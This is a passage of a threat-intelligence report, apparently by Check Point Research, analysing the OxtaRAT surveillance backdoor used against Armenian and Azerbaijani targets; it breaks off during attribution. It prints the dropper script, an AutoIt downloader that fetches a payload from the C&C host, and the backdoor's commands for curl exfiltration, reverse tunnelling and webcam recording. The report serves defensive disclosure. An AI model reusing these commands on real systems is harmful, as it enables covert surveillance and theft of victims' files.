{
	"id": "a00a5c29-b5c5-4c5f-96a8-34a2100b60f0",
	"created_at": "2026-04-06T00:13:47.572332Z",
	"updated_at": "2026-04-10T13:11:52.916586Z",
	"deleted_at": null,
	"sha1_hash": "b193f073c01e5420165d7f91a89e2de32ae2e2a8",
	"title": "Operation Silent Watch: Desktop Surveillance in Azerbaijan and Armenia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 153100,
	"plain_text": "Operation Silent Watch: Desktop Surveillance in Azerbaijan and\r\nArmenia\r\nBy etal\r\nPublished: 2023-02-16 · Archived: 2026-04-05 21:12:28 UTC\r\nExecutive summary\r\nAmid rising tensions between Azerbaijan and Armenia over the Lachin corridor in late 2022, Check Point Research\r\nidentified a malicious campaign against entities in Armenia. The malware distributed in this campaign is a new version of a\r\nbackdoor we track as OxtaRAT, an AutoIt-based tool for remote access and desktop surveillance.\r\nKey findings:\r\nThe newest version of OxtaRAT is a polyglot file, which combines compiled AutoIT script and an image. The tool\r\ncapabilities include searching for and exfiltrating files from the infected machine, recording the video from the web\r\ncamera and desktop, remotely controlling the compromised machine with TightVNC, installing a web shell,\r\nperforming port scanning, and more.\r\nCompared to previous campaigns of this threat actor, the latest campaign from November 2022 presents changes in\r\nthe infection chain, improved operational security, and new functionality to improve the ways to steal the victim’s\r\ndata.\r\nThe threat actors behind these attacks have been targeting human rights organizations, dissidents, and independent\r\nmedia in Azerbaijan for several years. This is the first time there is a clear indication of these attackers using\r\nOxtaRAT against Armenian targets and targeting corporate environments.\r\nIn this report, we provide a full technical analysis of the OxtaRAT as well as its capabilities and evolution over the years. We\r\nalso discuss the tactics, techniques and procedures (TTPs) of the threat actors, complete with an overview of their activity\r\nthroughout the years.\r\nBackground\r\nThe Republic of Artsakh, also known as the Nagorno-Karabakh Republic, is a breakaway region in the South Caucasus with\r\na majority ethnic Armenian population but is recognized internationally as part of Azerbaijan. It is a de facto enclave within\r\nAzerbaijan, with the only land route to Armenia through the Lachin corridor, which has been under the control of Russian\r\npeacekeepers since the end of the Second Nagorno-Karabakh War in 2020.\r\nThe situation in Artsakh is tense, with frequent ceasefire violations and sporadic outbreaks of violence. For more than two\r\ndecades, this unresolved highly militarized ethno-nationalist territorial conflict continues to be a source of tension between\r\nArmenia and Azerbaijan.\r\nFigure 1 – Map of the conflict over Nagorno-Karabakh (Artsakh). Source: CNN.\r\nThe Infection Chain\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 1 of 12\n\nFigure 2 – The infection chain.\r\nA malicious file named Israeli_NGO_thanks_Artsakh_bank_for_the_support_of.scr was submitted to VirusTotal (VT) on\r\nNovember 29, 2022, from an IP address located in Yerevan, Armenia.\r\nIt is a self-extracting archive that masquerades as a PDF file and bears a PDF icon. Upon execution, it drops to the Temp\r\nfolder of the infected device and executes a self-extracting cab called Alexander_Lapshin.EXE . This in turn drops multiple\r\nadditional files and executes one of them – the exec.bat script. In its deobfuscated form, this script is very short:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\n@echo off\r\nxcopy /y /e /k /h /i * %appdata%\\Autoit3\\\r\ncopy /b /y %appdata%\\Autoit3\\Alexander_Lapshin.pdf %temp%\\\r\nstart %temp%\\Alexander_Lapshin.pdf\r\nstart %appdata%\\Autoit3\\Autoit3.exe %appdata%\\Autoit3\\icon.png\r\nexit\r\n@echo off xcopy /y /e /k /h /i * %appdata%\\Autoit3\\ copy /b /y %appdata%\\Autoit3\\Alexander_Lapshin.pdf %temp%\\ start\r\n%temp%\\Alexander_Lapshin.pdf start %appdata%\\Autoit3\\Autoit3.exe %appdata%\\Autoit3\\icon.png exit\r\n@echo off\r\nxcopy /y /e /k /h /i * %appdata%\\Autoit3\\\r\ncopy /b /y %appdata%\\Autoit3\\Alexander_Lapshin.pdf %temp%\\\r\nstart %temp%\\Alexander_Lapshin.pdf\r\nstart %appdata%\\Autoit3\\Autoit3.exe %appdata%\\Autoit3\\icon.png\r\nexit\r\nThe exec.bat file is responsible for opening a lure PDF file that contains a Wikipedia article about Alexander Lapshin. At\r\nthe same time, in the background, it copies multiple auxiliary files and the AutoIt interpreter to %appdata%\\Autoit3\\ and\r\nuses it to execute a malicious AutoIt code hidden inside an image called icon.png .\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 2 of 12\n\nFigure 3 – Lure PDF document.\r\nAlexander Lapshin, a Russian-Israeli travel blogger, journalist, and human rights activist, was detained in Belarus in 2016\r\nand extradited to Azerbaijan. He was sentenced to 3 years in prison for illegally crossing the internationally recognized\r\nborders of Azerbaijan, without authorization from the Azerbaijani authorities, in 2011 and 2012 while visiting Nagorno-Karabakh from Armenia. Nine months into his detention, in September 2017, Lapshin was attacked in a solitary confinement\r\ncell of a Baku pre-trial detention center. The attack was publicly declared by Azerbaijani officials to be a suicide attempt.\r\nAfterward, he was pardoned by the Azerbaijani President and deported to Israel.\r\nIn 2021, the European Court of Human Rights in the “CASE OF LAPSHIN v. AZERBAIJAN” ruled that Lapshin’s right to\r\nlife had been violated by Azerbaijan authorities and mandated that Azerbaijan pay 30,000 Euros as compensation. After the\r\nverdict, Lapshin publicly posted a picture of the credit card he opened to receive his compensation, issued by the Armenian\r\nArtsakhbank. Likely, this incident made Lapshin’s name an attractive lure for the attackers targeting the bank.\r\nThe OxtaRAT Backdoor\r\nAs we mentioned previously, AutoIT.exe is used to run code from an image called icon.png . This is a polyglot malware,\r\ncombining valid JPEG and AutoIT A3X file formats:\r\nFigure 4 – Icon.png image and its internal structure.\r\nAutoIT is a legitimate tool that is used by many IT administrators to automate tasks but is frequently abused by threat actors.\r\nIn this case, the actors use a fully functional backdoor containing approximately 20,000 lines of obfuscated AutoIt code:\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 3 of 12\n\nFigure 5 – Fragment of OxtaRAT code including string obfuscations and random names.\r\nThe backdoor, which we call OxtaRAT, contains a variety of capabilities typically associated with espionage activity. It\r\ncontains commands that allow the attackers to:\r\nRun additional code on the infected machine, install a PHP web shell, download, upload and execute files.\r\nSearch and exfiltrate files from specific locations or with specific patterns, and even install the PHP FileManager for\r\neasier access to and management of the files.\r\nPerform active surveillance activity: record video from a web camera or desktop, and install additional software, such\r\nas TightVNC, to remotely control and monitor the machine.\r\nPerform recon on the local machine, such as getting information about the processes, drives, system information, and\r\nthe speed of the internet connection using Speedtest.\r\nUse a compromised host as a pivot to move through the network: perform port scanning and use Putty’s plink for\r\ntunneled communication.\r\nExecution flow\r\nThe backdoor starts by first setting up its base folder, moving the icon.png file there, and adding a persistence mechanism\r\nto run it every 2 minutes with AutoIt3.exe via a scheduled task named WallPaperChangeApp . It also creates a working\r\nfolder to store the results and logs of each command execution and sets hidden and system attributes for both base and\r\nworking folders to conceal them from being easily discovered and arouse suspicion. It also downloads the legitimate curl\r\nexecutable and DLL, which are later used for some types of C\u0026C communication.\r\nThe C\u0026C server for this sample is edupoliceam[.]info , a lookalike for the domain of the Police Education Complex of\r\nPolice of the Republic of Armenia.\r\nNext, the malware enters the main infinite loop, where in each step it performs the following actions:\r\nCreates a screenshot of the infected computer.\r\nSends a GET request to the C\u0026C server to report the victim’s basic information:\r\nhttps://edupoliceam[.]info/upload.php?GUID=\u003cguid\u003e\u0026SYS=PC_Name|User_Name|IP_address .\r\nUploads (using curl) to the C\u0026C server all the files from the working folder which contain screenshots and the results\r\nand logs of the previous command execution.\r\nSends a GET request to C\u0026C server to retrieve the command from the URL:\r\nhttps://edupoliceam[.]info/upload.php?GUID=\u003cguid\u003e\u0026come=1 .\r\nMost of the capabilities require additional files, mostly legitimate, to be downloaded during the malware execution from the\r\npath on the server /requirement/up/bin/ :\r\n/requirement/up/bin/postup.exe (curl.exe)\r\n/requirement/up/bin/libcurl.dll\r\n/requirement/up/bin/vlc.zip\r\n/requirement/up/bin/7zxa.dll\r\n/requirement/up/bin/7za.exe\r\n/requirement/up/bin/7za.dll\r\n/requirement/up/bin/pscclient.exe (port scanner)\r\n/requirement/up/bin/ptun.exe (Plink)\r\n/requirement/up/bin/wintight.exe (TightVNC)\r\n/requirement/up/bin/wsrrun.exe (PHP CLI and PHP File Manager, https://sourceforge.net/projects/phpfm/)\r\n/requirement/up/bin/WinRAR32.zip\r\n/requirement/up/bin/WinRAR64.zip\r\n/requirement/up/bin/speedtest.zip (based on https://github.com/sivel/speedtest-cli)\r\n/requirement/up/bin/AppCrashCollector.exe (the “implant”)\r\nThe only next-stage tool that wasn’t available on the server, was AppCrashCollector.exe , whose download and execution\r\nare triggered by the implant command. We assume that this is the payload that the actors attempt to hide from researchers\r\nand deliver to important targets only after additional checks are performed on the infected machine.\r\nC\u0026C communication and commands\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 4 of 12\n\nThe communication between the malware and its C\u0026C server is based on clear text commands, the arguments for each\r\ncommand are separated by the “|” sign.\r\nThe full list of commands supported by the backdoor:\r\ncommand parameters description\r\ndownload file name\r\nUpload a file using curl (postup.exe):  postup.exe -s -o nul\r\n-k --max-time 777 -A \"Mozilla/5.0 (Windows NT 11.0;\r\nrv:54.0) Gecko/20100101 Firefox/96.1\" -F\r\n\"file=@\"filename\"\r\nhttps://edupoliceam[.]info/upload.php?GUID=\u003cguid\u003e .\r\nupload file name\r\nDownload a file and save it with a specified filename and\r\nrandom prefix in the Temp directory.\r\nuploadexec file name\r\nDownload and execute with  wmic /node:%computername%\"\r\nprocess call create $output_filename .\r\naueval\r\nexpression to be\r\nevaluated\r\nExecute a specified expression with AutoIT command\r\nExecute.\r\nmakepersistent Create a scheduled task called  WallPaperChangeApp .\r\nImplant Download and execute  AppCrashCollector.exe .\r\nstopimplant\r\nKill the  AppCrashCollector  process with  taskkill\r\n/IM  and set settings.ini to 0.\r\nsearch path, pattern\r\nSearch for a pattern in a specified path with  PowerShell -\r\nNoni -command '(get-childitem '\" \u0026 $path \u0026 \"' -Recurse\r\n-ea 0)| select Fullname | ? {$_.Fullname -like '\" \u0026\r\n$pattern \u0026 \"'} | fl .\r\nlistdesktop\r\nList the contents of the Desktop folder with  dir /s\r\n\"%homepath%\\Desktop .\r\nlistdir directory path\r\nList a specified directory recursively, including the last\r\nmodified date and size.\r\nmassdownload path, filter\r\nUpload files from a specified path with a specified filter\r\n(include/exclude), using curl for each file (the same way as\r\nthe download command), with  \u0026MASSDL=1  parameter in the\r\nURL.\r\nmassdownload2list path, filter\r\nList all files in a specified path matching the specified filter to\r\nthe  Thumb.db  file.\r\nmassdownload2\r\npath, filter,\r\n[range]\r\nUpload files from a specified path from  Thumb.db  with\r\nPOST request to the URL with  \u0026MASSDL2=1  parameter.\r\nwebcamrecord length\r\nWebcam recording using VLC:  $tmp_blcvid \u0026\r\n\"\\blc\\vlc\\MediaRun.exe --no-qt-privacy-ask dshow:// --\r\nsout file/avi:\" \u0026 $tmp_blcvid \u0026 \"\\webcam-video-record-\"\r\n\u0026 $timestamp \u0026 \"-sec-\" \u0026 $chunk_length \u0026 \".avi --run-time=\" \u0026 $chunk_length \u0026 \" -Idummy --quiet\r\nvlc://quit\" . The records are uploaded zipped using curl and\r\nare then deleted.\r\ndesktoprecord length\r\nDesktop recording using VLC:  $tmp_blcvid \u0026\r\n\"\\blc\\vlc\\MediaRun.exe --no-qt-privacy-ask screen:// --\r\nsout file/avi:\" \u0026 $tmp_blcvid \u0026 \"\\Desktop-video-record-\r\n\" \u0026 $timestamp \u0026 \"-sec-\" \u0026 $chunk_length \u0026 \".avi --run-time=\" \u0026 $chunk_length \u0026 \" -Idummy --quiet\r\nvlc://quit\" . The records are uploaded zipped using curl and\r\nthen deleted.\r\ntightvnc\r\nDownload  Wintight.exe  (AutoIt compiled executable\r\nwhich extracts and runs tvnserver.exe) and execute it\r\nwith  wmic process call create .\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 5 of 12\n\ncommand parameters description\r\nkilltightvnc Kill TightVNC with  taskkill /IM TVN* /F .\r\nzipit\r\nsource, zip file\r\nname,\r\ndestination,\r\n[filter]\r\nZip the folder using  7za.exe .\r\nunzipit\r\nsource,\r\ndestination\r\nUnzip the archive using  7za.exe .\r\ninstallrar Download and unzip WinRAR.\r\nrarit\r\nsource,\r\ndestination,\r\n[extensions],\r\n[volume_size]\r\nArchive the file/files with specific extensions from the folder\r\nusing WinRAR.\r\nunrarit\r\nsource,\r\ndestination\r\nExtract the archive using Unrar.exe.\r\nreboot Reboot with  cmd.exe /c shutdown -r -t 0 /f .\r\ncurl url\r\nExecute the curl command:  postup.exe -i -vvv -k --max-time 60 -A \"Mozilla/5.0 (Windows NT 11.0; rv:54.0)\r\nGecko/20100101 Firefox/96.0.1\" \u0026 $url .\r\nportscan\r\nip/ip_range,\r\nport/port_range\r\nDownload and execute the portscan script (AutoIT-based  pscclient.exe )\r\ntunnel\r\nserver, user,\r\npassword, port,\r\nhost, host_port,\r\nlocal_port\r\nDownload, unzip and execute reverse port forwarding with\r\nplink:  ptun.exe \u0026 $server \u0026 \" -P \" \u0026 $port \u0026 \" -C -R\r\n127.0.0.1:\" \u0026 $listen_port \u0026 \":\" \u0026 $host \u0026 \":\" \u0026\r\n$host_port \u0026 \" -l \" \u0026 $user \u0026 \" -pw \" \u0026 $password .\r\nkilltunnel\r\nKill the tunnel with  taskkill /IM powers* /F \u0026 taskkill\r\n/IM ptun.exe .\r\nwwwserv\r\nDownload, unzip and run PHP web server on port 3136 with\r\nPHP File Manager. This is done by downloading the AutoIT-based  wsrrun.exe  which extracts all needed files and\r\nexecutes php CLI as  connectionlessupdate.exe -q -S\r\n127.0.0.1:3136 -t \u003croot folder\u003e -H .\r\nstopwwwserv Kill the web server with  taskkill /IM connectionle* /F .\r\nwmicexec process\r\nExecute with  'wmic /node:' \u0026 %computername% \u0026 'process\r\ncall create' \u0026 $process .\r\nsysinfo\r\nCollect system info with  hostname \u0026 ipconfig /all \u0026 arp\r\n-a \u0026 getmac \u0026 net use \u0026 net share \u0026 quser\r\n/server:localhost \u0026 whoami /all \u0026 net user \u0026 systeminfo\r\n\u0026 wmic process get commandline \u0026 nslookup\r\nmyip.opendns.com. resolver1.opendns.com .\r\ngetip\r\nGet the IP address with nslookup myip.opendns.com\r\nresolver1.opendns.com.\r\nshowdrives\r\nGet network drives with  powershell -ep bypass -command\r\nget-psdrive .\r\nproclist Get the process list by  wmic process get commandline .\r\nspeedtest Download, unzip and execute Speedtest.\r\nshowagentversion\r\nReturn the agent version (version 11 is hardcoded in this\r\nspecific sample).\r\ntempclean\r\nClean the Temp folder with  rmdir /q /s %temp%, mkdir\r\n%temp% .\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 6 of 12\n\ncommand parameters description\r\nradar time\r\nExit if the time since the last call is smaller than the\r\nparameter.\r\nexitself Exit.\r\nFor the commands that require output, the final command line that was executed and its output are written to the working\r\ndirectory to the file with Random(1, 815782) \u0026 \"-command-.txt\" name.\r\nPrevious campaigns\r\nAlthough not widely discussed, previous versions of the OxtaRAT backdoor were used in earlier attacks against Azerbaijani\r\npolitical and human rights activists – or, when the targets were not disclosed publicly, their lures referenced Azerbaijan-Armenia tensions around Artsakh. The older versions of OxtaRAT have significantly less functionality than the new variant\r\nbut contain similar code and names for most of the commands and the same C\u0026C communication pattern.\r\nJune 2021\r\nIn July 2021, Qurium Media reported that several prominent human rights and political activists in Azerbaijan received\r\ntargeted phishing emails that lured them to download malware from the Google Drive link. The link led to a password-protected RAR archive (the password was specified in the email) which in turn contained an Auto-IT compiled executable\r\ncalled “Human Rights Invoice Form Document -2021.exe\" . When executed, it downloaded from the C\u0026C server\r\nshoesbuysellone[.]live the main AutoIT malware (md5: 0360185bc6371ae42ca0dffe0a21455d). Although it doesn’t\r\ncontain a hardcoded “agent version” number, we can clearly see that this is an earlier version of OxtaRAT. It has very\r\nsimilar functionality and code, but supports fewer commands (11 in total):\r\ndownload\r\nimplant\r\nstopimplant\r\nmassdownload\r\nwebcamrecord\r\ndesktoprecord\r\nmakepersistent\r\naueval\r\nupload\r\nuploadexec\r\nwmicexec\r\nAugust 2021\r\nIn August 2021, another sample was observed, this time submitted to VirusTotal from Armenia. The file called\r\nREPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION (Final Updated 2021).scr also bears the PDF icon, and when\r\nexecuted, presents the victim with the following PDF lure:\r\nFigure 6 – PDF lure for the August 2021 version (md5: ddac9a1189e4b9528d411e07d0e98895).\r\nIn the background, it downloads the main malware from the C\u0026C server https://www.filecloudservices.xyz/wp-comment.php and saves it as PhoneAppService.Exe . The code of this version implements the same string obfuscation as the\r\nnewest version:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 7 of 12\n\n$koda_gui =\r\nStringFromASCIIArray(StringSplit(\"77|111|122|105|108|108|97|47|53|46|48|32|40|76|105|110|117|120|59|32|85|59|32|65|110|100|114|111|105|100|32|52|46\r\n\"|\"), 1) // Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like\r\nGecko) Version/4.0 Mobile Safari/534.30 18.3\r\nFileInstall(\".\\REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n@AppDataDir \u0026 \"\\\" \u0026 \"REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n1)\r\n$n =\r\nStringFromASCIIArray(StringSplit(\"104|116|116|112|115|58|47|47|119|119|119|46|102|105|108|101|99|108|111|117|100|115|101|114|118|105|99|101|115|46\r\n\"|\"), 1) //https://www.filecloudservices.xyz/wp-comment.php\r\n$m = StringFromASCIIArray(StringSplit(\"80|104|111|110|101|65|112|112|83|101|114|118|105|99|101|46|69|120|101\", \"|\"), 1)\r\n//PhoneAppService.Exe\r\nRun(@ComSpec \u0026 \" File.txt /\" \u0026 \"c \" \u0026 StringFromASCIIArray(StringSplit(\"115|116|97|114|116\", \"|\"), 1) \u0026 \" \" \u0026\r\n@AppDataDir \u0026 \"\\\" \u0026 \"REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n@AppDataDir, @SW_HIDE)\r\nHttpSetUserAgent($koda_gui)\r\nHttpSetProxy(1)\r\nInetGet($n, @TempDir \u0026 \"\\\" \u0026 $m, 1)\r\n$koda_gui =\r\nStringFromASCIIArray(StringSplit(\"77|111|122|105|108|108|97|47|53|46|48|32|40|76|105|110|117|120|59|32|85|59|32|65|110|100|114|111|105|100|32|52|46\r\n\"|\"), 1) // Mozilla/5.0 (Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like\r\nGecko) Version/4.0 Mobile Safari/534.30 18.3\r\nFileInstall(\".\\REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n@AppDataDir \u0026 \"\\\" \u0026 \"REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\",\r\n1) $n =\r\nStringFromASCIIArray(StringSplit(\"104|116|116|112|115|58|47|47|119|119|119|46|102|105|108|101|99|108|111|117|100|115|101|114|118|105|99|101|115|46\r\n\"|\"), 1) //https://www.filecloudservices.xyz/wp-comment.php $m =\r\nStringFromASCIIArray(StringSplit(\"80|104|111|110|101|65|112|112|83|101|114|118|105|99|101|46|69|120|101\", \"|\"), 1)\r\n//PhoneAppService.Exe Run(@ComSpec \u0026 \" File.txt /\" \u0026 \"c \" \u0026 StringFromASCIIArray(StringSplit(\"115|116|97|114|116\",\r\n\"|\"), 1) \u0026 \" \" \u0026 @AppDataDir \u0026 \"\\\" \u0026\r\n\"REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\", @AppDataDir,\r\n@SW_HIDE) HttpSetUserAgent($koda_gui) HttpSetProxy(1) InetGet($n, @TempDir \u0026 \"\\\" \u0026 $m, 1)\r\n$koda_gui = StringFromASCIIArray(StringSplit(\"77|111|122|105|108|108|97|47|53|46|48|32|40|76|105|110|117|120|5\r\nFileInstall(\".\\REPORT_ON_THE_AZERBAIJANI_MILLITARY_AGRESSION_AGAINST_ARTSAKH.pdf\", @AppDataDir \u0026 \"\\\" \u0026 \"REPORT\r\n$n = StringFromASCIIArray(StringSplit(\"104|116|116|112|115|58|47|47|119|119|119|46|102|105|108|101|99|108|111\r\n$m = StringFromASCIIArray(StringSplit(\"80|104|111|110|101|65|112|112|83|101|114|118|105|99|101|46|69|120|101\"\r\nRun(@ComSpec \u0026 \" File.txt /\" \u0026 \"c \" \u0026 StringFromASCIIArray(StringSplit(\"115|116|97|114|116\", \"|\"), 1) \u0026 \" \" \u0026\r\nHttpSetUserAgent($koda_gui)\r\nHttpSetProxy(1)\r\nInetGet($n, @TempDir \u0026 \"\\\" \u0026 $m, 1)\r\nFebruary 2022\r\nIn February of last year, Qurium reported another attack, this time targeting Abulfaz Gurbanli, an Azerbaijani political\r\nactivist. The attackers pretended to be BBC journalists and, similar to the June 2021 attacks, sent the victim an email which\r\ncontained a Google Drive link, pointing to a password-protected RAR archive called BBC-suallar.rar (“BBC questions”).\r\nOnce again, a AutoIT-compiled executable called suallar.scr was extracted. This time, it masqueraded as a Word\r\ndocument, complete with a Word icon. Upon execution, it presented the lure DOC file called smm-fraza.doc .\r\nIn the background, it downloaded from the C\u0026C server https://smartappsfoursix[.]xyz/wp-feed.php and run another\r\nversion of OxtaRAT. This is a more advanced version, compared to the 2021 attacks, with many additional commands added\r\n(29 in total):\r\ndownload\r\naueval\r\nupload\r\nuploadexec\r\nexittemp\r\nimplant\r\ncurl\r\nreboot\r\nzipit\r\nunzipit\r\ntunnel\r\ntightvnc\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 8 of 12\n\nstopimplant\r\nradar\r\nmassdownload\r\nwebcamrecord\r\ndesktoprecord\r\nmakepersistent\r\nuntrace\r\nwwwserv\r\nstopwwwserv\r\nwmicexec\r\nsearch\r\nsysinfo\r\nshowdrives\r\ngetip\r\nlistdesktop\r\nkilltightvnc\r\nkilltunnel\r\nThe version from June 2021 was capable only of downloading and exfiltrating files, executing the binaries and AutoIT code,\r\nand recording data from the desktop and web camera. In contrast, the version observed in February 2022 is a more powerful\r\nmalware with a lot of additional features. The actors added capabilities to improve local file enumeration (list files on the\r\ndesktop, search for specific files), collect data about the compromised system, work with zip files, and, most importantly,\r\nimproved the ways they can access and control the infected machine by adding commands to install TightVNC or the PHP\r\nweb server.\r\nHow does the attack from November 2022 differ from the earlier attacks?\r\nInfection chain\r\nThe first change that the actors implemented in their latest attack is in the infection chain. Previously, the initial .SCR files,\r\nmasquerading as Word or PDF documents, served only as downloaders. They sent a request to WordPress-like URLs on the\r\nC\u0026C server ( wp-feed.php , wp-comment.php , etc) and then executed the main malware received from the attackers’ server.\r\nIn the latest campaign, the .SCR file already contains the OxtaRAT backdoor, as a polyglot file. This saves the actors from\r\nneeding to make additional requests for binaries to the C\u0026C server and attracting unnecessary attention, as well as hides the\r\nmain malware from being easily discovered on the infected machine, as it looks like a regular image and bypasses type-specific protections.  \r\nGeofencing\r\nThe actors added an additional measure to protect their infrastructure, geofencing the C\u0026C domains that store the auxiliary\r\ntools and additional payloads. This is a technique currently used by many experienced threat actors to make sure that the\r\nproper execution flow is not triggered by sandboxes or researchers, but only on the targeted machines. In this case, the actors\r\nlimited their operations to Armenian IP addresses.\r\nData collection and exfiltration\r\nSince the previous publicly disclosed version, OxtaRAT was updated with 10 additional commands introducing new\r\nfunctionality. Most of the new features aim to improve the ways to steal the victim’s data. For example, they implemented\r\nthe listdir command to recursively enumerate the files in a specified folder, collecting additional data such as the last\r\nmodified date and size. The previously existing command massdownload , which is used to exfiltrate files of predefined\r\ntypes, was also updated with a few new file extensions (marked in bold):\r\n\"*.mdb;*.accdb;*.rdo;*.ora;*.accda;*.accdr;*.accdt;*.ppt;*.avi;*.pptx;*.odt;*.pdf;*.txt;*.msf;*.docx;*.xml;*.doc;*.rtf;*.jpg;*.jpeg;*.pn\r\nAs can be seen from this snippet, the actors are now interested in additional file types related to Oracle and Microsoft Access\r\ndatabases. This is an interesting development, as it indicates they may be broadening their targets to include corporate\r\nnetworks or specific individuals, as common private computers rarely contain personal files in DB formats.\r\nThe actors also implemented “advanced” mass-download commands such as the massdownload2 and massdownload2list\r\nthat allow the actors to enumerate and exfiltrate specified filetypes more conveniently. In addition, they implemented\r\nfunctions to work with RAR archives ( installrar , rarit , unrarit ) which, along with the clear benefits of uploading\r\nthe auxiliary tools inside RAR archives to the infected machines, enable the actors to archive all the files of their interest to\r\nthe multi-volume RAR archive. The default list of extensions provided in the code of the rarit exfiltration function shows\r\na focus on documents, pictures, archives, and databases:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nFunc rar_it($source_file_or_dir, $destination_path, $extensions_to_rar =\r\n\"*.xls;*.xlsx;*.doc;*.docx;*.pdf;*.rar;*.zip;*.tar;*.tar.gz;*.sql;*.txt;*.mdb;*.jpg;*.jpeg;*.accdb\", $parts = \"12M\")\r\nhttps://research.checkpoint.com/2023/operation-silent-watch-desktop-surveillance-in-azerbaijan-and-armenia/\r\nPage 9 of 12\n\nFunc rar_it($source_file_or_dir, $destination_path, $extensions_to_rar =\r\n\"*.xls;*.xlsx;*.doc;*.docx;*.pdf;*.rar;*.zip;*.tar;*.tar.gz;*.sql;*.txt;*.mdb;*.jpg;*.jpeg;*.accdb\", $parts = \"12M\")\r\nFunc rar_it($source_file_or_dir, $destination_path, $extensions_to_rar = \"*.xls;*.xlsx;*.doc;*.docx;*.pdf;*.ra\r\nAnother interesting feature included in the most recent version is the speedtest command which invokes Speedtest CLI, a\r\ndedicated tool to test the speed and performance of an internet connection. As the malware is not only capable of collecting a\r\nlarge quantity of files but also recording video from a web camera and screen, it can produce significantly large outputs with\r\ngigabytes of data. Therefore, for the sake of OPSEC, to hide the extensive data exfiltration the actors likely needed a way to\r\ncontrol and estimate the upload all of the collected information to their servers.\r\nThe last feature added to the data collection mechanism is a proclist command, which uses WMIC to retrieve the\r\ncommand line for each of the processes. This feature might be used for evasion purposes, so the actors can make sure they\r\nare running in an actual environment as opposed to a sandbox, as well as to learn more about the software configurations\r\nrunning on the victim’s machine.\r\nPort Scanning\r\nOne of the unexpected features that we found during this investigation is the portscan tool, which is included only in the\r\nnewer version of the backdoor. The port scanner, pscclient.exe , is an Auto-IT based non-obfuscated TCP Connect tool\r\nthat can scan a specified range of IP addresses and a range of ports. The default range of ports configured in the tool includes\r\nboth well-known and non-standard ports:\r\nPlain text\r\nCopy to clipboard\r\nOpen code in new window\r\nEnlighterJS 3 Syntax Highlighter\r\nGlobal $port_range[100] = [135, 4444, 136, 137, 138, 139, 20, 21, 22, 23, 80, 443, 445, 8443, 8080, 3131, 3128, 5681,\r\n5060, 5061, 3389, 33899, 33399, 3390, 389, 4000, 1433, 1521, 9222, 45687, 7292, 789, 50022, 2109, 2233, 55522, 33391,\r\n33392, 33390, 33394, 33389, 33398]\r\nGlobal $port_range[100] = [135, 4444, 136, 137, 138, 139, 20, 21, 22, 23, 80, 443, 445, 8443, 8080, 3131, 3128, 5681,\r\n5060, 5061, 3389, 33899, 33399, 3390, 389, 4000, 1433, 1521, 9222, 45687, 7292, 789, 50022, 2109, 2233, 55522, 33391,\r\n33392, 33390, 33394, 33389, 33398]\r\nGlobal $port_range[100] = [135, 4444, 136, 137, 138, 139, 20, 21, 22, 23, 80, 443, 445, 8443, 8080, 3131, 3128\r\nOxtaRAT, which previously had mostly local recon and surveillance capabilities, can now be used as a pivot for active\r\nreconnaissance of other devices. This may indicate that the threat actors are preparing to extend their main attack vector,\r\nwhich is currently social engineering, to infrastructure-based attacks. It also might be a sign that the actors are moving from\r\ntargeting individuals to targeting more complex or corporate environments.\r\nInfrastructure\r\nOur search for domains with similar characteristics to edupoliceam[.]info led to more active domains:\r\nfilesindrive[.]info , mediacloud[.]space and avvpassport[.]info . All the domains are registered with NameCheap.\r\nWhile filesindrive[.]info and mediacloud[.]space , similar to filecloudservices[.]xyz used in back in 2021, have\r\na generic reference to cloud file storages, the domain avvpassport[.]info is more specific, and it masquerades as the\r\nPassport and Visa Office of the Republic of Armenia. Both of these domains, edupoliceam[.]info and\r\navvpassport[.]info , were created on September 23, 2022, and were likely also used for other attacks on Armenian\r\ntargets.\r\nAt the beginning of our investigation, all of these domains used Cloudflare services to hide their IP addresses. Due to their\r\nconfiguration, by looking for IP addresses with the same behavior, we identified 38.242.197[.]156 as likely their real IP\r\naddress. While we were completing the investigation and notifying the relevant parties, Cloudflare blocked these domains as\r\nmalicious, and they all started to publicly resolve to their real IP address 38.242.197[.]156 .\r\nTargeting and Attribution\r\nAlexander Lapshin, whose name is used in the lure, shared that on the same day the samples were uploaded to VT, the\r\nrepresentatives of Artsakh bank notified that they received malicious emails in his name. This information was also later\r\nconfirmed by Cyberhub-AM, digital security helpdesk for Armenian civil society. Due to the infrastructure 